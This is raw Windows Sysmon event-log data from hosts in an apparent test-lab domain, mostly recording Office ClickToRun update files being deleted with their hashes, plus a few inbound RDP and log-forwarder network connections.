Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB2A.BDRMD5=4C013DC165B317C374B5E5093AA3BAEB,SHA256=24DD1D3F07CF6BF674B0DBEA9E84BC65B37CE9AEDFEA3A818DC7942F909882A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB1B.BDRMD5=1E638AB5E5E7FB51C131A29CD49CF912,SHA256=CDAD590C21A5E761CC81CA810D67BDA06A208516CA91BEBE1549C5B43E384A79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB1A.BDRMD5=6263CCEF9EEB8F5A8B31BBEB6236804D,SHA256=15819B994279364E4CC0FCF4CAE57B7CF614F13CF9A062EA74F32FF97D53812E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB11.BDRMD5=2A35CDB4755AD1AA27E055D00EEA3DF4,SHA256=FC0B0E52C5C632227051437CAFE146F4314E84B7219FC4356F8C81F2162493CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB10.BDRMD5=B6A34B31A48977574E1BB124A39E00F9,SHA256=48C1BB8C3FD960DB9E2750409BDCA83633C9711B6D7E156732DC0998473C23F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8FR.LEXMD5=059248CB490BD520141580FE55BD22BF,SHA256=3A1610C98B8980E2558FC342A882B26BC6C259F221D46D2EB727BCDB93C4F05F,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000069481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.516{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-30404-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000069480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.488{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33133-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000069479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.118{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57502-false10.0.1.12-8000- 23542300x800000000000000069478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8FR.DLLMD5=BB39330234EC27091769159C574423DA,SHA256=6760115AA8E3DDA6CF72F3ED46B490B17AB1DCBFBFAEFDA19712969175C4CC52,IMPHASH=7BDCB0000B94A10C08FAD439602803D0truetrue 23542300x800000000000000069477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8ES.LEXMD5=069FD7F637956FF4C9B51FC18B8121EB,SHA256=B60C30039BE16A35720D43C188CCC5FFF55A3B56E94ED5EA3A27512DE4A17510,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8ES.DLLMD5=56A67234A8C72B78300CF6D3187A7E68,SHA256=79B83F33747ED1C28888B50F4EDE8B51D4A88A28467D98BFE9A4E7959509B406,IMPHASH=7BDCB0000B94A10C08FAD439602803D0truetrue 23542300x800000000000000069475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8EN.LEXMD5=C0F8C0ADCCB0BBF687CD5931A5886C05,SHA256=9E88F38B3AEE9DFA7FABB89B174D40AA63294A6C88350B7948D851E54CF20DB6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msth8EN.DLLMD5=AA5F7D872D9AA6DB005476F22C41E920,SHA256=618421B96A02C4C3DC73BCF4575824FF2DEA600D5B1E5A2F44B1195C99543F3B,IMPHASH=7BDCB0000B94A10C08FAD439602803D0truetrue 23542300x800000000000000069473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msspell7.dllMD5=6B4D2DD80BBC2B73FB76FF960F776683,SHA256=C9F0F1E1EF035F4B9EB444D66E7F044BA40F78841196DA71560B5D1FB94DFE36,IMPHASH=5118414A43FD45147540743E596A75ECtruetrue 23542300x800000000000000069472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSSP7FR.LEXMD5=E234D6643978C0B25B9A86DF8B29B6F8,SHA256=0DEBC330556A9DA0E04DDE4AD6B59F1966EBA418CB292B50BAEA953A474DC90A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSSP7FR.dubMD5=DE504021F3652C12A3399EDEAFEEA3D7,SHA256=FE252502B4A24DD9C39DC629BD5C2E17867AC95CD6C2180514B45E11E1F5F79A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSSP7ES.LEXMD5=1EFC0751C0F55FA6D7191B5336742677,SHA256=488EE365B0A4DD2C1208C698EF5DC8FBA8D60E261EDFA20DD7BB3951D33A5116,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049757Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:24.893{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F4989A3096366FC88D5FB3178B61F1,SHA256=88A8A26F1B9D7B8BCE104E5E9781E31F2B7CE58FE3471807A55175C0F822D5D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049756Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:20.905{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57324-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000069886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\vendor.jsMD5=5D4A9AE9AAE839A41B8AB72F228C22C4,SHA256=CE6EFDFF224DEC6DBD0B5D1C177752F835FF3B3C5B24E1767A38CD1BC1954D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\urlmap.iniMD5=551A26D601545482F4F94F733E1F9779,SHA256=98A7CABD175A7B2DE3D4835DFEEF5250C4FACFC864D1D88F05FB930B89FECDD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\taskpane_dev.htmlMD5=7497D875A5D44839DCE2DA54E4C82D3D,SHA256=37C9363E79075443B7AD6C3E8137828F31DC73C8B089C35B4E90953C1264023A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\taskpane.js.mapMD5=12A590C27EFC1FB7C37147B78DCB74DF,SHA256=A06A60DA908CEA047EA27137CC13843B1194636978C5A0A814D0A576674D6B76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.865{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\taskpane.jsMD5=CA55CF08849965970E60AAABC007A808,SHA256=00F22096CF2ED85E22CC687CBC7DDEECC73B3A8DB9EF30D691FBD570787CB1B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\taskpane.htmlMD5=E5C46B7B7F05618A0C27B3125221A72F,SHA256=A7DABDE99401E8F716117D0A48961B7BA231F8AE13FCF186EF482872DDC3C270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\taskpane.cssMD5=D7652E9BAB022F29AF4C0E47981B8A7C,SHA256=18A26455EE23DF24DAEEA7F8777C3AE7C050BCED3212B1022028F6EC739464C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\oteljs_agave.jsMD5=6058A109FE9CDDF74681E25B5EB1D38B,SHA256=9C4C8A47BE6AA4222F7D824CA32C613704033F314708A0B409ACF8E3CCBF52B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\office_strings.jsMD5=6DAE09CF02392A81E6E6EC201C1E4703,SHA256=960F8EB4DD53639D78CAFC1C92D9F51BA5CFE1FC77F69BF0DE31D93A6CE12CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\office_ae93d9adc451c87c91aee21405f54a9b.jsMD5=C83724DAE5B87488F4E0CA32FC14F6AE,SHA256=2460D57D79D726F63D42E078E3B152A6730122F9E0AC4B80DA54B8784650A026,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\office_2e97d65336bd5d3533e966e9de09077e.jsMD5=145C4755DE2815B6B4AED1F0A3909765,SHA256=53006D3434A0F5C6B4300A8560D5244ED54393CF347C22A45BF731A4C2FA9563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\icon-32_b62bf135812d19b144fb591e3966e8ed.pngMD5=95EF187DADFAA5A8726CD087285C37F4,SHA256=F7BBECFB6EFAE634755F18662B5B19F13B6C4EEDBCC49366DFC3947771498C63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\fabric.min_94d234d74ed3449a31fa3e9521910f6e.cssMD5=D211176C3419A4D5B9FFBB0AC44065FB,SHA256=9A78F4D82C2A27A889148A96B46A3D55C2682BC182AED580924E4D88F67A2948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000054\OfflineFiles\excel-win32-16.01_5550f857f39758975e9353759ce8237a.jsMD5=605830D535065BFE794981831AE0C792,SHA256=CE0D587CA929A39DB08425F929C946C17AB1B1B317F1FBD7EC22739BCCE93F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\strings.resjsonMD5=5C09325B74E8D71C813EB874105152E5,SHA256=D62F965818426021D3EA6EDC84F428021B921252FD48D655CEDAE7A5141E68F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\StoreLogo.pngMD5=3B41150E4CB804AA1B26CCA06DC509C8,SHA256=EA757E4A70287F2A5AD3C5388ED2342BFAD38CA41969EA23C84D8CD499839D9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\manifest.xmlMD5=380EFBB016750EB288EB41747965D7CE,SHA256=D7F4882568F4324BBB40132F0DB3093470447A265A5D3EF7584AF9237B177477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\main.stats.jsonMD5=33D6EE3DB20217073B425EC1EF44A9A9,SHA256=CB0532C2393CAFA9591352840FED47121336824D90F2ACF5775CA6855E27C067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\index.win32.bundle.mapMD5=89F7DF9FEFFCA9FF8052C3234D4BD748,SHA256=951D624233228730EEEC44114296F8E3BC232CE6D082AB3201AD91F471E979F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\index.win32.bundle.LICENSE.txtMD5=0533FBFFA8A478B12D0E3C27C8A3385C,SHA256=DD9EAB76D3F738B4F1B8F08CFA79D2F6987BD6DE58E1CA8AE111D857877C40E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\index.win32.bundleMD5=7ECE46E985F9EFABB126C03F0CE9D431,SHA256=01E95D1F80E6C7A66D5D6E5819C3E1AE833E80AA1B88C47AADA6EB9D1503AF09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000049\catalog.jsonMD5=4442BAFDA5EE0312DD55DEC0EE81D820,SHA256=AD532EEFDD777EE06DE6A10B49029777247331BD31B5A04D0D03F665B91458E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\strings.resjsonMD5=0B519A115CD8C5C42CEDFDBA1787F548,SHA256=1A1CBB33BA94D492A2CAEC5E47D51299E554FFB03794F8EC47CED2CFF4944766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\mecontrol.win32.bundle.mapMD5=09C77AE98F49B643FAB02ABB2B554999,SHA256=B2DF278A519F235E7D8BEDF22AD671B649A12D6A68461226F68F8C018C6A6C02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\mecontrol.win32.bundle.LICENSE.txtMD5=783F14FA45B10E088E68F98251448010,SHA256=0D8F66CD4AFB566CB5B7E1540C68F43B939D3EBA12ACE290F18ABC4F4CB53ED0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000042\mecontrol.win32.bundleMD5=97CF14404E647425E1CEA323D5A04961,SHA256=97A47CBD038E81EE7B0557BB9CF4914F8E31D19DE0118A7A377F6A0523FEB4B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 